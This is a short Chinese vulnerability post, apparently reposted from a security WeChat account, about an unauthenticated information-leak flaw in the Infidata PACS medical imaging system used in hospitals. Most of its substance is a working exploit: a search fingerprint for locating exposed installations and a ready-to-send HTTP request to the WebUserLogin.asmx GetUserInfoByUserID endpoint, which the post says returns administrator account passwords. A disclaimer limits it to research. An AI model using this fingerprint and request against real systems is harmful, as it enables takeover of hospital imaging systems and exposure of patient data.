英飞达医学影像存档与通信系统 Picture Archiving and Communication System,它是应用在医院影像科室的系统,主要的任务就是把日常产生的各种医学影像(包括核磁,CT,超声,各种X光机,各种红外仪、显微仪等设备产生的图像)通过各种接口(模拟,DICOM,网络)以数字化的方式海量保存起来,当需要的时候在一定的授权下能够很快的调回使用,同时增加一些辅助诊断管理功能。它在各种影像设备间传输数据和组织存储数据具有重要作用。
英飞达医学影像存档与通信系统 WebUserLogin.asmx 接口存在信息泄露漏洞,未经身份攻击者可通过该漏洞获取系统后台管理员账户密码信息,登录后台,导致系统处于极不安全的状态。
body="./scripts/library/bluebird.min.js"
GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/2Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
验证
登录
原文始发于微信公众号(暗影网安实验室):英飞达软件有限公司信息泄露漏洞【带工具】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论